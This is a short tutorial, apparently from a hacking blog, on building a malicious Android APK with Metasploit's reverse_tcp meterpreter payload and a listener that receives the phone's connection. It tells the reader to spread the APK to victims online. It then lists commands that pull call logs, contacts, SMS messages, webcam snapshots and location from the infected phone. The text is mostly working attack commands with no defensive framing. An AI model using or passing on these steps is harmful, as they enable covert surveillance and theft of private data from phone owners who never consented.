1. Open terminal (CTRL + ALT + T) view tutorial how to create Linux keyboard shortcut.
2. We will utilize Metasploit payload framework to create exploit for this tutorial.
msfpayload android/meterpreter/reverse_tcp LHOST=192.168.0.102 LPORT=443 R > VHacker.apk
As described above that attacker IP address is 192.168.0.102
3. Because our payload is reverse_tcp where attacker expect the victim to connect back to attacker machine, attacker needs to set up the handler to handle incoming connections to the port already specified above.
Type msfconsole to go to Metasploit console.
use exploit/multi/handler –> we will use Metasploit handler
set payload android/meterpreter/reverse_tcp –>
make sure the payload is the same with step 2
4. The next step we need to configure the switch for the Metasploit payload we already specified in step 3.
set lhost 192.168.0.102 –> attacker IP address
set lport 443 –> port to listen the reverse connection
exploit –> start to listen incoming connection
5. Attacker already have the APK's file and now he will start distribute it (I don't need to describe how to distribute this file,
internet is the good place for distribution
6. sysinfo Gets information about the remote system, such as OS
7. check_root Check if device is rooted
8. dump_calllog Get call log
9. webcam_list List webcams
10. webcam_snap Take a snapshot from the specified webcam
11. dump_contacts Get contacts list
12. dump_sms Get sms messages
13. geolocate Get current lat-long using geolocation